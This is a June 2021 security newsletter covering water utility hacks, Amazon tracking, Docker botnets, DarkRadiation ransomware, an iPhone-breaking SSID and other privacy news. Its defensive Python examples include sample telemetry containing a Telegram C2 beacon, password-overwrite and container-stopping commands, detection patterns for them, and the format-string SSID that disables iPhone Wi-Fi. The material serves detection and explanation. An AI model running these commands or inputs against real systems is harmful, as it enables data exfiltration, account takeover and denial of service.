The Wild Swings in Temperature of the IT Privacy and Security Weekly Update for June 22nd, 2021

G’Day Daml’ers!

From splashing in cold waters to baking in hot homes we cover the whole temperature range.

After a good headcount of our critical infrastructure, we give you the lowdown on tracking, bots, faces, and fingerprints. We update you on compliance, regulations, and (sadly) taxes, before delivering really bad news for our Red Hat Linux and Docker users.

Finally, we unbork your iPhone before revealing just why you might be reading this in a full sweat.

So pull on your swimming trunks, put on your gloves and let’s go have an adventure with this week’s IT Privacy and Security Update!

US: How Cyber Safe is Your Drinking Water Supply?

The Water Sector Coordinating Council surveyed roughly 600 employees of water and wastewater treatment facilities nationwide and found that 37.9 percent of utilities had identified all of their IT-networked assets, while another 21.7 percent were still working toward that goal. “Identifying IT and OT assets is a critical first step in improving cybersecurity,” the report concluded. “An organization cannot protect what it cannot see.” And because it's hard to see threats you're not looking for, a full 67.9 percent of water systems reported no IT security incidents over the last 12 months.

While documenting each device that needs protection is a necessary first step, a number of recent cyberattacks on water treatment systems have been blamed on a failure to properly secure the employee accounts used for remote access.

In April, federal prosecutors unsealed an indictment against a 22-year-old from Kansas who is accused of hacking into a public water system in 2019. The defendant in that case is a former employee of the water district he allegedly hacked.

In February, we learned that someone hacked into the water treatment plant in Oldsmar, Fla. and briefly increased the amount of sodium hydroxide (a.k.a. lye, used to control the acidity of the water) to 100 times the normal level. That incident stemmed from stolen or leaked employee credentials for TeamViewer, a popular program that lets users remotely control their computers. Before that, in January, a hacker tried to poison a water treatment plant that served parts of the San Francisco Bay Area. The hacker in that case also had the username and password for a former employee's TeamViewer account.

What are US authorities doing? Water utilities serving more than 50,000 people have to certify to the Environmental Protection Agency (EPA) that they comply with America's Water Infrastructure Act of 2018, which requires an asset inventory and sets a minimum bar for cybersecurity.
The act gives utilities serving between 3,300 and 50,000 residents until the end of this month to complete a cybersecurity risk and resilience assessment. That includes a review of:
  • Pipes and constructed conveyances
  • Physical barriers
  • Source water
  • Water collection and intake
  • Pretreatment, treatment, storage, and distribution facilities
  • Electronic, computer, or other automated systems
In addition to assessing the physical parts of the system, the utility must also assess:
  • Monitoring practices (physical security, water quality)
  • Financial infrastructure (accounting, billing, and the ability to run payroll when facing a threat, including a cyberattack or the destruction of the administration buildings housing these systems)
  • Use, storage, or handling of chemicals by the water system
  • Operation and maintenance of the system

But here is the rub: the vast majority of the nation's water utilities, tens of thousands of them, serve fewer than 3,300 residents, and those utilities currently do not have to report to the EPA about their cybersecurity practices (or the lack thereof). “A large number of utilities — probably close to 40,000 of them — are small enough that they haven't been asked to do anything.”

So what's the upshot for you? Enabling multi-factor authentication for remote access would prevent many of these attacks, but first the accounts in use would have to stop being shared: a second factor tied to one person's phone protects nothing when the whole shift knows the TeamViewer login, and, as the Kansas and Bay Area cases show, a former employee's credentials need to be revoked the day they leave. If you know anyone who works at a water utility, have them read this or listen to the Podcast… We'll get the message across and you will drink the cool water of success.

Global: All the Ways Amazon Tracks You

OK let’s start with Amazon’s privacy notice. At more than 4,400 words it’s hardly surprising that most people don’t read it, but it does clearly lay out what Amazon does with your data. Broadly, the information that Amazon collects about you comes from three sources. These are the data you give it when you use Amazon (and its other services, such as reading Kindle books), the data it can collect automatically (information about your phone and your location), and, finally, information it gets from third parties (credit checks to find out if your account is fraudulent, for example). The ultimate goal of all this data collection? To help sell you more things.

“Personal data about shopping is incredibly sensitive,” says Carissa Véliz, an associate professor at the University of Oxford’s Institute for Ethics. “It can tell you about a person’s health status, their political tendencies, their sexual practices, and much more. People buy all kinds of things on Amazon, from books and movies to health-related items. Add to that personal data from Alexa, and it gets even more concerning.”

Amazon also uses information, such as your location, to make sure the things you buy actually get delivered to you.

Amazon's privacy policy says you might—depending on your settings and how much you've decided to hand over—give it: your name; address and phone number; bank details; age; location; the names, emails, and addresses of people in your contacts; any photographs you've uploaded to your profile; playlists; watchlists; wishlists; voice recordings; Wi-Fi credentials; credit history information and, if you sell items on Amazon, tax and other business information.

The automatic information Amazon collects is where things get amped up a bit higher. This is all data about how and when you use Amazon products. Freelance journalist Riccardo Coluccini was sent a table with 12,048 rows detailing all the clicks he made on Amazon’s website. “The values concern the day and time when a specific page is visited, the IP address and the device used, the geolocation—if possible—based on the IP address, and the name of the telecommunication company that offers the internet service,” he wrote in 2018. Similarly, other data requests to Amazon show how Kindle logs the date, time spent reading, and how often you copy or highlight parts of books. Likewise, Ring doorbells log every record of motion they detect and each tap made within the Ring app.

Amazon's privacy notice details that it may automatically collect your IP address; login details; the location of your computer; errors your device logs when using its services; your app preferences; cookie details; identifiers linked to your phone or computer; and all the URLs that you click, including page interaction information “such as scrolling, clicks, and mouse-overs”.

The final type of information Amazon collects about you is that from third parties. This can include updated delivery addresses if a delivery company finds there’s a problem with the one you provided; account and purchase information from “merchants with which we operate co-branded businesses”; information about “interactions” with Amazon’s subsidiaries (there’s a lot of them and they have their own privacy policies); information about devices you’ve linked with Alexa; and credit history it gets as part of its efforts to detect fraud.

It’s impossible to stop Amazon from tracking you completely—if you’re going to shop with Amazon then Amazon will collect your data.

Alexa and Ring have their own privacy hubs where you can delete recordings and manage privacy settings. But for the majority of Amazon information, you'll need your main account. You can turn off Amazon showing you personalized ads based on what it infers about your interests and likes, although you will still see recommendations based on your previous purchases on Amazon (they can be tweaked, but not turned off). You should also consider turning off advertising cookies, which allow third parties to collect your information. Amazon's list of third-party cookie partners includes more than 75 companies, ranging from Facebook to mobile gaming giant King.

So what's the upshot for you? This is a frighteningly large dataset by any standard, so if you ever get to the point where that much profiling information leaves you feeling uncomfortable, you can perform the ultimate purge. Set up a new account with a different e-mail and run a few transactions through it. Once you are satisfied that it works the way you want, delete your original account and start using the new one; every year or so you can repeat the swap. Yes, sorry, this truly is the only way to clear down the data.

Global: Half of all misconfigured containers hit by botnets within one hour.

New research indicates a rise in cyberattacks targeting container infrastructure and supply chains with:

  • Higher levels of sophistication in attacks: Attackers have amplified their use of evasion and obfuscation techniques in order to avoid detection. These include packing the payloads, running malware straight from memory, and using rootkits.
  • Botnets are swiftly finding and infecting new hosts as they become vulnerable: 50% of new misconfigured Docker APIs are attacked by botnets within 56 minutes of being set up.
  • Crypto-currency mining is still the most common objective: More than 90% of the malicious images execute resources hijacking.
  • Increased use of backdoors: 40% of attacks involved creating backdoors on the host; adversaries are dropping dedicated malware, creating new users with root privileges and creating SSH keys for remote access.
  • Volume of attacks continues to grow: Daily attacks grew 26% on average between the first half and second half of 2020.

So what's the upshot for you? We expect this kind of news from a container security firm, but the reminder that open, misconfigured, public-facing ports in cloud infrastructure are being probed constantly is always worth highlighting. Remember that an unauthenticated Docker API is effectively root on the host: whoever reaches it can start a privileged container with the host filesystem mounted, which is exactly how the backdoors and root users in the list above get planted.
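As an added example (not from the research summarized above, and not a tool the vendor ships), the following Python checks a Docker daemon configuration for the misconfiguration those botnets scan for: the Engine API exposed over TCP without client-certificate verification. The two daemon.json dictionaries and the dockerd command lines are constructed for the demonstration; the option names (hosts, tlsverify, tlscacert, -H) are real dockerd options.

```python
"""Added example, not from the research above: flag a Docker daemon whose
Engine API is reachable over TCP without mutual TLS. The configs below are
constructed; 'hosts', 'tlsverify', 'tlscacert' etc. are real dockerd options."""
from urllib.parse import urlsplit

WEAK_CONFIG = {      # constructed: the open API that gets found within the hour
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
}

HARDENED_CONFIG = {  # constructed: TCP on one interface only, clients must present a cert
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}


def parse_dockerd_cmdline(cmdline: str) -> dict:
    """Map a dockerd command line onto the daemon.json key names, so both
    sources of configuration can be assessed by the same function."""
    cfg = {"hosts": []}
    tokens = cmdline.split()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in ("-H", "--host") and i + 1 < len(tokens):
            cfg["hosts"].append(tokens[i + 1])
            i += 2
            continue
        if tok.startswith("--host="):
            cfg["hosts"].append(tok.split("=", 1)[1])
        elif tok.startswith("--tls"):          # --tls, --tlsverify, --tlscacert=PATH ...
            key, _, val = tok.lstrip("-").partition("=")
            cfg[key] = val if val else True
            if val.lower() in ("false", "0"):
                cfg[key] = False
        i += 1
    return cfg


def assess_docker_api(cfg: dict) -> list:
    """Return human-readable findings; an empty list means no TCP listener
    that lacks client-certificate verification or that binds every interface."""
    findings = []
    for host in cfg.get("hosts", []):
        url = urlsplit(host)
        if url.scheme != "tcp":
            continue                           # unix:// and fd:// stay local
        bind = url.hostname or ""
        port = url.port or (2376 if cfg.get("tlsverify") else 2375)
        if not cfg.get("tlsverify"):
            # --tls alone only encrypts; without tlsverify any client is accepted,
            # and an unauthenticated Engine API is root on the host.
            findings.append(f"{host}: Engine API on port {port} without client certificate verification")
        if bind in ("", "0.0.0.0", "::"):
            findings.append(f"{host}: bound to all interfaces")
    return findings
```

Run it against the output of `ps -o args= -C dockerd` or the contents of /etc/docker/daemon.json; the hardened shape is the one to copy: a specific interface, port 2376, and tlsverify with a CA you control.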

EU: The European Union Wants a Ban on AI Facial Recognition

The EU’s data protection agencies on Monday called for an outright ban on using artificial intelligence to identify people in public places, pointing to the “extremely high” risks to privacy.

The European Commission's own proposal, by contrast, includes special exceptions allowing the use of mass facial recognition in cases such as searching for a missing child, averting a terror threat, or tracking down someone suspected of a serious crime.

Brussels hopes its first-ever legislative package on AI will help Europe catch up with the US and China in a sector that spans from voice recognition to insurance and law enforcement.

In a statement, the commission said it took note of the opinion but stood by a proposal “that provides sufficient protection and limits the use of those systems to the strict minimum necessary”.

The proposal is under negotiation at the European Parliament and among the 27 member states.

So what’s the upshot for you? The outcome could set a global standard for how tech is regulated.

US: Six Flags to Pay $36M Over Collection of Fingerprints

Theme park operator Six Flags has agreed to pay US$36 million to settle a class-action lawsuit over its acquisition of the fingerprint data of visitors to its theme parks.

The Illinois Supreme Court ruled in Rosenbach v. Six Flags that collecting biometric data at the gates by scanning the fingerprints of people entering the company's theme park violates the Illinois Biometric Information Privacy Act (BIPA).

The case involved a mother, Stacy Rosenbach, who in 2016 sued Six Flags Entertainment Corp. after the Gurnee, Illinois, branch of the theme park scanned the fingerprint of her 14-year-old son Alex without obtaining written consent and without properly disclosing the company’s business practices as to how they would use the data.

After passing through lower courts, the case made it to the Illinois Supreme Court, where Six Flags filed a motion to dismiss the case, claiming that Rosenbach was not an “aggrieved party” according to the BIPA because she had not proven an actual injury under the law.

However, the court denied the motion, ruling that someone “need not allege some actual injury or adverse effect, beyond violation of his or her rights” to qualify as an “aggrieved” person under the law, according to its decision.

So what’s the upshot for you? Passed in 2008, the BIPA regulates how companies collect and use someone’s biometric data, such as a retina or iris scan, fingerprint, voiceprint, or scan of hand or face geometry. The law mandates that a company must obtain a person’s written consent before acquiring and storing this type of data.

US: A Fifth of Google Play Apps Violate Child Protection Laws

One in five apps on Google Play designed for children appear to be breaking US federal law, according to new research from Comparitech.

The consumer rights and comparison site analyzed the top 300 free and top 200 paid apps on the marketplace under the children and family categories and reviewed each listed privacy policy.

It found that one in five contravened the Children’s Online Privacy Protection Act (COPPA), legislation which places a strict set of FTC-enforced requirements on websites and online services aimed specifically at the under-13s, or those that collect personal data on children.

Of the 20% of Google Play-listed apps found to be violating COPPA, half were collecting personal information from children without the required child-specific privacy policy in place.

Nine percent tried to shift responsibility onto children and parents, either by asking kids not to submit their personal info to the app or by asking parents to monitor their child's app usage. Both violate COPPA.

“Furthermore, two hundred and seventy-four of the apps we reviewed also received the teacher-approved tick with 50 (18%) in violation of COPPA guidelines. This means the apps and their privacy policies have been through two layers of review and have still passed quality control despite being in breach of COPPA’s standards.”

Most of the offending information collected by the apps was IP addresses (42%), followed by online contact information (16%), name (12%), address (7%), telephone number (7%), and other details.

So what’s the upshot for you? In 2019 YouTube paid the Federal Trade Commission $170 million to settle a case under COPPA where they collected personal information from viewers of child-oriented channels without asking parents first. In this case, it is unclear who would be fined, Google or the app developers.

UK: Despite warnings, MI5 still risks breaking the law by continuing to hold outdated surveillance data.

MI5's storage of personal data on espionage subjects still faces “legal compliance risk” issues in spite of years of warnings from the UK government regulator.

The sustained legal issues even triggered a Parliamentary statement by Home Secretary Priti Patel, revealing that the domestic spy agency did not have “a culture of individual accountability for legal compliance risk” until external oversight forced change upon the agency.

The latest report, itself a report into an earlier review which made recommendations MI5 hasn’t fully complied with, stems back to failures first identified in the mid-2010s.

Reports over the years revealed an internal culture within MI5 that seemingly treated legal compliance as an unimportant formality. Related allegations of law-breaking are the subject of an ongoing legal case by the Privacy International campaign group.

Back in 2017, there was at least one complex error reported by MI5 in relation to the retention of data on an area within their IT systems. At the time, a statement said, “MI5 is undertaking work to remedy this problem and delete data which has been retained erroneously.”

It doesn’t look like that clean-up work was ever completed.

So what’s the upshot for you? Information can become a huge liability if it is held after it has served its useful purpose. It’s just a shame that the British government is so slow to learn this.

US: Hit by a Ransomware Attack? Your Payment May Be Tax-Deductible

A report from The Associated Press over the weekend cited tax lawyers and accountants who said the little-known deduction could be a “silver lining” for ransomware victims.

However, the deduction could also be seen as a further corporate incentive to pay up, encouraging more affiliate groups to join the race to extort big-name multinationals.

It also flies in the face of official US government guidance, repeated many times by FBI boss Christopher Wray and others, that organizations should not pay any ransom.

For now: “I would counsel a client to take a deduction for it,” says Scott Harty, a corporate tax attorney with Alston & Bird. “It fits the definition of an ordinary and necessary expense.”

So what’s the upshot for you? We don’t expect this tax break to last very long… Especially after this Associated Press report!

Global: Wormable DarkRadiation Ransomware Targets Linux and Docker Instances

“The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions,” researchers from Trend Micro said in a report published last week. “The malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram’s API to send an infection status to the threat actor(s).”

As of writing, there’s no information available on the delivery methods or evidence that the ransomware has been deployed in real-world attacks.

The findings come from an analysis of a collection of hacking tools hosted on the unidentified threat actor’s infrastructure (IP address “”) in a directory called “api_attack.” The toolset was first noticed by Twitter user @r3dbU7z on May 28.

DarkRadiation's infection chain involves a multi-stage attack process and is noteworthy for its extensive reliance on Bash scripts to retrieve the malware and encrypt the files, as well as on the Telegram API to communicate with the C2 server via hardcoded API keys.

Said to be under active development, the ransomware leverages obfuscation tactics to scramble the Bash script using an open-source tool called “node-bash-obfuscate” to split the code into multiple chunks, followed by assigning a variable name to each segment and replacing the original script with variable references.

Upon execution, DarkRadiation checks whether it is running as root and, if so, uses the elevated permissions to download and install Wget, cURL, and OpenSSL. It then takes a snapshot of the users currently logged in, using the “who” command every five seconds, and exfiltrates the results to an attacker-controlled server via the Telegram API.

“If any of these are not available on the infected device, the malware attempts to download the required tools using YUM (Yellowdog Updater, Modified), a python-based package manager widely adopted by popular Linux distros such as RedHat and CentOS,” SentinelOne researchers explained in a write-up published Monday.

In the final phase of the infection, the ransomware retrieves a list of all existing users on the compromised system, overwrites their passwords with “megapassword,” and deletes all shell users, but not before creating a new user with the username “ferrum” and password “MegPw0rD3” to carry out the encryption process.
DarkRadiation also comes with capabilities to stop and disable all running Docker containers on the infected machine, after which a ransom note is displayed to the user.

“Malware written in shell script languages allows attackers to be more versatile and to avoid some common detection methods,” SentinelOne researchers said.

“As scripts do not need to be recompiled, they can be iterated upon more rapidly. Moreover, since some security software relies on static file signatures, these can easily be evaded through rapid iteration and the use of simple obfuscator tools to generate completely different script files.”
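The behaviours described above (tool staging via YUM, polling “who” every few seconds, beaconing to the Telegram API, the ferrum user and password overwrites, stopping every Docker container, and OpenSSL AES-CBC encryption) are all visible in process-execution telemetry, which is where detection belongs given how easily the script itself is re-obfuscated. The Python below is an added example, not code from Trend Micro, SentinelOne or the malware: it runs a handful of rules, including a temporal one for the “who” polling, over constructed process-creation records. The JSON field names, the sample events and the thresholds are assumptions for the demonstration; only the ferrum / MegPw0rD3 / megapassword values come from the report.

```python
"""Added example, not from the Trend Micro or SentinelOne write-ups: detection
rules for the DarkRadiation behaviours, run over constructed process-execution
records. Field names, sample events and thresholds are assumptions."""
import json
import re
from collections import deque
from datetime import datetime, timedelta

# Constructed process-creation events (one JSON object per line), in the shape an
# EDR or auditd pipeline might emit. Only ferrum / MegPw0rD3 / megapassword are
# taken from the report; timestamps, hosts and the bot token are invented.
SAMPLE_EVENTS = """
{"ts":"2021-06-20T10:00:00","user":"root","cmd":"yum install -y wget curl openssl"}
{"ts":"2021-06-20T10:00:05","user":"root","cmd":"who"}
{"ts":"2021-06-20T10:00:10","user":"root","cmd":"who"}
{"ts":"2021-06-20T10:00:15","user":"root","cmd":"who"}
{"ts":"2021-06-20T10:00:20","user":"root","cmd":"who"}
{"ts":"2021-06-20T10:00:25","user":"root","cmd":"who"}
{"ts":"2021-06-20T10:00:26","user":"root","cmd":"curl -s https://api.telegram.org/bot123456:ABCDEF/sendMessage -d chat_id=42 -d text=online"}
{"ts":"2021-06-20T10:01:00","user":"root","cmd":"useradd -m ferrum"}
{"ts":"2021-06-20T10:01:01","user":"root","cmd":"bash -c 'echo ferrum:MegPw0rD3 | chpasswd'"}
{"ts":"2021-06-20T10:01:02","user":"root","cmd":"bash -c 'echo alice:megapassword | chpasswd'"}
{"ts":"2021-06-20T10:01:03","user":"root","cmd":"userdel -r alice"}
{"ts":"2021-06-20T10:01:10","user":"root","cmd":"docker stop $(docker ps -aq)"}
{"ts":"2021-06-20T10:01:20","user":"root","cmd":"openssl enc -aes-256-cbc -pass pass:x -in /home/alice/report.docx -out /home/alice/report.docx.enc"}
{"ts":"2021-06-20T11:30:00","user":"alice","cmd":"who"}
"""

# Pattern rules: each matches one reported behaviour on a single command line.
RULES = [
    ("tool_staging",        re.compile(r"^yum\s+install\b.*\b(wget|curl|openssl)\b")),
    ("telegram_c2",         re.compile(r"\b(curl|wget)\b.*api\.telegram\.org/bot")),
    ("account_takeover",    re.compile(r"\bchpasswd\b|\buseradd\b.*\bferrum\b|\buserdel\b")),
    ("container_shutdown",  re.compile(r"\bdocker\s+(stop|rm|kill)\b.*docker\s+ps\b")),
    ("openssl_cbc_encrypt", re.compile(r"\bopenssl\s+enc\b.*-aes-\d+-cbc\b")),
]

# Temporal rule: a single `who` is normal; the same user running it this many
# times inside the window is the five-second polling loop. Thresholds assumed.
WHO_POLL_THRESHOLD = 5
WHO_POLL_WINDOW = timedelta(seconds=60)


def parse_events(text: str) -> list:
    """Parse JSON-lines telemetry into dicts with a datetime 'ts' field."""
    events = []
    for line in text.strip().splitlines():
        rec = json.loads(line)
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        events.append(rec)
    return events


def detect(events: list) -> list:
    """Return (rule, iso_timestamp, detail) tuples for every rule that fires."""
    hits = []
    recent_who = {}                                  # user -> deque of timestamps
    for ev in sorted(events, key=lambda e: e["ts"]):
        cmd = ev["cmd"]
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, ev["ts"].isoformat(), cmd))
        if re.fullmatch(r"who(\s.*)?", cmd):         # `who`, not `whoami`
            q = recent_who.setdefault(ev["user"], deque())
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > WHO_POLL_WINDOW:
                q.popleft()                          # drop calls outside the window
            if len(q) == WHO_POLL_THRESHOLD:         # fire once, when the burst reaches threshold
                hits.append(("session_polling", ev["ts"].isoformat(),
                             f"{len(q)} 'who' calls by {ev['user']} within {WHO_POLL_WINDOW.seconds}s"))
    return hits


def triggered_rules(events: list) -> list:
    """Sorted, de-duplicated rule names, convenient for a quick triage view."""
    return sorted({name for name, _, _ in detect(events)})
```

The hardcoded password and username are deliberately only one term of one rule: the SentinelOne quote above explains why the script's bytes will change, and the upshot below notes the password probably already has. The Telegram beacon, the mass `docker stop`, the `chpasswd` piping and the `who` loop are what the malware has to do regardless of how it is repacked.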

So what's the upshot for you? Linux used to be treated as the last bastion that malware would not bother with. Not anymore. And since this malware is still under development, it's a sure bet that the hardcoded password has already been changed, so don't hang a detection on that string alone.

Global: This WiFi Name will bork your iPhone

A new iPhone bug has come to light that breaks your iPhone's wireless functionality merely by connecting to a WiFi network with a specific name.

Once triggered, the bug would render your iPhone unable to establish a WiFi connection, even if it is rebooted or the WiFi hotspot is renamed.

"After joining my personal WiFi with the SSID ‘%p%s%s%s%s%n’, my iPhone permanently disabled its WiFi functionality. Neither rebooting nor changing SSID fixes it."
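That SSID is made entirely of printf-style conversion specifiers, which is the signature of a format-string bug: somewhere the network name is being used as the format argument rather than as data (Apple has not published the root cause, so treat that as an inference from the string itself). The Python below is an added example, not code from the reporter or from iOS: it classifies an SSID by the directives it contains and shows the bug pattern next to the fix. Python raises an exception where C would read and write memory through arguments the caller never supplied, but the root cause, untrusted input in the format position, is the same.

```python
"""Added example, not from the original report: why an SSID built from printf
conversion specifiers is dangerous. The format-string diagnosis is inferred
from the SSID's contents; this reproduces the bug class, not Apple's code."""
import re

REPORTED_SSID = "%p%s%s%s%s%n"

# One printf-style conversion: % [flags] [width] [.precision] [length] conv
DIRECTIVE = re.compile(
    r"%(?:%|[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|L|j|z|t)?[diouxXeEfFgGaAcspn])"
)


def format_directives(ssid: str) -> list:
    """Conversions an SSID would trigger if it were ever used as the *format*
    argument of a printf/NSLog-style call. '%%' is a literal percent, so it
    is dropped."""
    return [m.group(0) for m in DIRECTIVE.finditer(ssid) if m.group(0) != "%%"]


def ssid_risk(ssid: str) -> str:
    """'critical' if the SSID can write memory (%n), 'high' if it can read
    through unsupplied arguments (%s, %p, ...), else 'none'."""
    directives = format_directives(ssid)
    if "%n" in directives:
        return "critical"   # %n stores a count through a pointer the caller never passed
    if directives:
        return "high"       # %s/%p dereference or leak stack contents: crash or info leak
    return "none"


def log_join_unsafe(ssid: str) -> str:
    """Bug pattern: untrusted data becomes the format string. Python raises on
    the bad directives; C would corrupt memory instead."""
    return ("Joined " + ssid) % ()


def log_join_safe(ssid: str) -> str:
    """Fix: the format string is a constant and the SSID is only ever an argument,
    so any name, including the reported one, is just printed verbatim."""
    return "Joined %s" % (ssid,)
```

The same check on the wireless side is trivial: if a network name contains a bare `%` directive, someone is either testing this bug or running an evil-twin access point, and neither is a network to join.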

So what's the upshot for you? Although we expect an iOS update imminently, there is a fix that does not require resetting your entire phone.
Follow these steps to reset your iOS network settings to resolve the issue:
1.) Go to Settings on your iPhone, select General.
2.) Under General select Reset.
You will now be at the Reset screen, where you can reset various features of iOS or the device itself.
3.) At this screen, select the ‘Reset Network Settings’ option and confirm you would like to continue when asked.
4.) The device will now restart and reset all of your network settings back to factory default. Once it has restarted, enter your passcode, and you can reconfigure your Wi-Fi settings again.

US: Smart thermostats cranked up remotely by Texas energy firms, as consumers swelter in heat wave

Some said they didn’t know their thermostats were being accessed from afar until it was almost 80 degrees inside their homes.

HOUSTON — Some neighbors in the Houston area said their homes have been much warmer this week, even while they are running their air conditioners.

Many of them claim someone has been turning up the temperature on their thermostats since the energy shortage began.

The Electric Reliability Council of Texas (ERCOT) has told residents to conserve as much energy as possible, asking them to set their thermostats to 78 degrees Fahrenheit (25.5 degrees Celsius) or higher during the peak hours of 3-7pm. But what are energy companies supposed to do if people really want their air conditioning to blast away the heat?

The answer, it appears, is to take remote control of users’ smart thermostats and bump up the temperature.

The affected users had enrolled their smart thermostats in a program called “Smart Savers Texas,” operated by a company called EnergyHub. As WFAA explains, signing up for “Smart Savers Texas” also grants energy firms the right to take remote control of the thermostat, turning it up and preventing it from being turned down again. The agreement states that, in exchange for entry into a sweepstakes, electric customers allow them to control their thermostats during periods of high energy demand.

Clearly, some Texans weren’t aware of the implications of what they had signed up for, and had no knowledge that someone else was controlling their thermostat during the heat wave – leaving their families sweltering.

So what's the upshot for you? Only now are some smart thermostat owners realizing that there are drawbacks to having a thermostat connected to the internet. Maybe this incident will act as a wake-up call to others: it's probably better to learn this lesson when your energy supplier meddles with your thermostat than when a malicious hacker does.

And that’s it for this week. Take se7en days to cool down when we promise we will have another hot IT Privacy and Security Weekly update for you.

Be kind. Stay safe. Stay Secure.